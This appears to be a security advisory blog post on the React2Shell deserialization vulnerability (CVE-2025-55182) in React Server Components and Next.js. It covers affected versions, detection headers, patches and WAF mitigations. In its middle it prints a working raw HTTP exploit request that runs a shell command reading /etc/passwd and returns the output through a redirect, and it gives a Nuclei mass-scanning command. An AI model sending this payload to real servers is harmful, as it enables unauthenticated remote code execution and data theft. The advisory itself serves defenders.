Skip to content 
What is React2Shell (CVE-2025-55182)?
A critical vulnerability with CVSS of 10.0 called React2Shell has been discovered in React’s Flight protocol that could allow attackers to execute arbitrary code on servers running React Server Components. CVE-2025-55182 affects multiple popular frameworks, including Next.js, React Router, React Server Components, and Waku, with exploitation possible under default configurations. Upon exploiting this vulnerability, lets an attacker get remote code execution or we call it as Command Injection on Frontend Server, giving complete control over the server, code and configurations.
Technical details of the React2Shell vulnerability
CVE-2025-55182 is an unsafe deserialization vulnerability in React’s Flight protocol, affecting server component payloads. It is a logical deserialization flaw where the server processes RSC payloads safely.
When a server receives a specially crafted, malformed HTTP payload (typically through data delivered in a POST request), it fails to correctly validate the structure of the data. Because of this insecure deserialization, the server allows attacker-controlled data to influence server-side execution logic. This flaw allows attackers to craft malicious payloads that, when processed by the server, can lead to unauthenticated remote code execution. Exploitation is possible under the default configuration of several popular frameworks, making the vulnerability critical and widely exploitable.
Which React and Next.js versions are vulnerable?
The following packages are vulnerable to CVE-2025-55182 because they implement parts of React’s Flight protocol, which handles server component payloads and is the source of the unsafe deserialization flaw:
| Package | Affected Versions |
| react-server-dom-parcel (npm) | 19.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack (npm) | 19.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-webpack (npm) | 19.0, 19.1.0, 19.1.1, 19.2.0 |
| next (npm) | >= 14.3.0-canary.77, < 15.0.5>= 15.2.0-canary.0, < 15.2.6>= 15.3.0-canary.0, < 15.3.6>= 15.4.0-canary.0, < 15.4.8>= 16.0.0-canary.0, < 16.0.7>= 15.1.0-canary.0, < 15.1.9>= 15.5.0-canary.0, < 15.5.7 |
Detection & Exploitation
There are multiple exploits present on the internet by now. You can use ActiveScan++ (v2.0.8) Extension in Burp Suite Professional which lets you quickly investigate React2Shell behaviour and validate specific endpoints.
If you are scanning lot of target then best way is to use Nuclei Engine along with template CVE-2025-55182
cat targets.txt | nuclei -id CVE-2025-55182
Raw HTTP Request:
POST / HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Connection: keep-alive Content-Length: 718 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad Next-Action: x X-Nextjs-Html-Request-Id: RmfltNIHJhLjoVdcwzrxi X-Nextjs-Request-Id: j2ubmjrn Accept-Encoding: gzip, deflate, br ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="0" {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
The root cause of this vulnerability lies in how React’s Flight protocol processes incoming data. The data is processed as chunks, as seen above, which can reference each other, denoted by the $ symbols. The exploit takes advantage of this behavior along with a bug caused by missing attribute checks, which allows access to properties such as constructor. The fix for the attribute check can be seen in the patch here.
The crafted payload chains internal gadgets to create a Promise-like object with an attacker-controlled “.then” property. During deserialization, these Promise-like objects are automatically resolved, which results in code execution.
To detect exploitation activity
- In Next.js apps, this header is next-action.
- In other apps, it may be rsc-action-id.
Some public exploit PoCs also exfiltrate data using query parameters during redirects. In Next.js, these values appear in the x-action-redirect response header.
Mitigating This Vulnerability
Customers must upgrade to the following patched versions to address the vulnerabilities:
- react-server-dom-parcel 19.0.1, 19.1.2, 19.2.1
- react-server-dom-turbopack 19.0.1, 19.1.2, 19.2.1
- react-server-dom-webpack 19.0.1, 19.1.2, 19.2.1
- Next.js releases 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
Another way to fix this vulnerability is to implement WAF. Multiple major WAFs, edge/CDN vendors and hosting platforms moved quickly to virtually-patch and blunt React2Shell (CVE-2025-55182). Cloudflare deployed automatic WAF rules and temporarily raised the WAF request-payload inspection window to 1 MB (and continues to tune rules/monitor exploit patterns), Vercel pushed automated patching for managed projects and actively triaged reports (and invited responsible disclosure/bug-bounty reports for WAF-bypass techniques), AWS/AWS WAF rolled rule updates into its managed rules and published guidance for custom rules, Google Cloud Armor published & recommended a Cloud-Armor rule to block exploit attempts, and large CDN/WAF vendors (Akamai, Fastly, F5/HAProxy, Imperva etc.) published advisories and shipped virtual-patch rules or detection signatures so proxied customers were protected while teams patched their runtimes